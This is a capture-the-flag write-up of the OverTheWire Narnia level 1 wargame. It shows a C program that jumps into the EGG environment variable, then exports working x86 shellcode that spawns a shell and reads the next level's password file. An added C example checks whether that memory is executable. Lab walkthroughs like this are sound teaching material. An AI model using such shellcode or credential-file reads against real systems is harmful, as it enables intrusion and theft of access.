Overthewire.org - Narnia 1 -> 2

Write-Up

Posted on February 2, 2017 as Overthewire. 2 minutes read.

Introduction

Another month, another challenge: the next part of OverTheWire's Narnia wargames. Unfortunately, lack of time made it impossible for me to publish anything sooner. Sorry for that!

Challenge

First, let's take a look at the code of the program.

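#include <stdio.h>
#include <stdlib.h>	/* getenv(), exit() */

int main(){
	int (*ret)();

	/* Refuse to run if EGG is not set at all. */
	if(getenv("EGG")==NULL){
		printf("Give me something to execute at the env-variable EGG\n");
		exit(1);
	}

	printf("Trying to execute EGG!\n");
	/* Treat the bytes of EGG's value as code and jump to them. */
	ret = (int (*)())getenv("EGG");
	ret();

	return 0;
}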

The first thing I see is that this program checks whether the EGG variable is set. If it is not, it prints the message and exits; otherwise, it tries to execute the variable's value.

But what is an environment variable?

Every time a shell session is started, a process gathers the information that should be available to the shell process and all of its child processes, and puts it in a special area called the environment.

Environment variables provide a way to influence the behaviour of software on the system. For example, the "LANG" environment variable determines the language in which software programs communicate with the user. They are represented as key-value pairs.

KEY=VALUE
KEY=VALUE1:VALUE2
KEY="VALUE WITH SPACES"

Now that we understand the topic, let's try setting the EGG variable to some random text, which will possibly cause the program to crash.

[email protected]:/narnia$ export "EGG"="completelyrandomtext"
[email protected]:/narnia$ ./narnia1
Trying to execute EGG!
Segmentation fault

Yes! Now let's try to find some x86 shellcode that will be executed by the program. What I found working was this shellcode, which was actually the second one I tried; the first one didn't want to cooperate ;)

[email protected]:/narnia$ export "EGG"=$'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80'
[email protected]:/narnia$ ./narnia1
Trying to execute EGG!
$ whoami
narnia2
$ cat /etc/narnia_pass/narnia2

We have the password to the next level!
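Jumping into the value of EGG only works when the memory holding that string is mapped executable; environment strings inherited from the parent normally live on the stack, which a default modern Linux build maps without execute permission, so the same call would fault. The following is an added example, not code from the original post or from OverTheWire: a Linux-only check that reads /proc/self/maps, with hypothetical function names region_perms and env_value_is_executable.

```c
/* Added example: report whether the memory holding an environment
 * variable's value is mapped executable (Linux, /proc/self/maps). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Copy the "rwxp" permission field of the mapping that contains addr
 * into perms. Returns 0 on success, -1 if no mapping was found. */
int region_perms(const void *addr, char perms[5])
{
    FILE *maps = fopen("/proc/self/maps", "r");
    char line[512];
    unsigned long start, end, target = (unsigned long)addr;
    int rc = -1;

    if (maps == NULL)
        return -1;
    while (rc != 0 && fgets(line, sizeof line, maps) != NULL) {
        char p[5];
        /* Line format: start-end perms offset dev inode [path] */
        if (sscanf(line, "%lx-%lx %4s", &start, &end, p) == 3 &&
            target >= start && target < end) {
            memcpy(perms, p, sizeof p);
            rc = 0;
        }
    }
    fclose(maps);
    return rc;
}

/* 1 = value is in executable memory, 0 = not executable,
 * -1 = variable unset or mapping not found. */
int env_value_is_executable(const char *name)
{
    char perms[5];
    const char *value = getenv(name);
    if (value == NULL || region_perms(value, perms) != 0)
        return -1;
    return perms[2] == 'x';
}

int main(void)
{
    int r = env_value_is_executable("EGG"); /* the variable narnia1 reads */
    printf("EGG: %s\n", r < 0 ? "unset or no /proc/self/maps"
                      : r ? "in EXECUTABLE memory" : "in non-executable memory");
    return 0;
}
```

Run it with EGG exported to any constructed string; a result of "in EXECUTABLE memory" means the binary was built or launched in a way that leaves its stack executable.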

Conclusion

It was another great challenge from OverTheWire. I'm looking forward to the next one, maybe something a little bit harder? We'll see!

Keep learning and stay safe!

~ W3ndige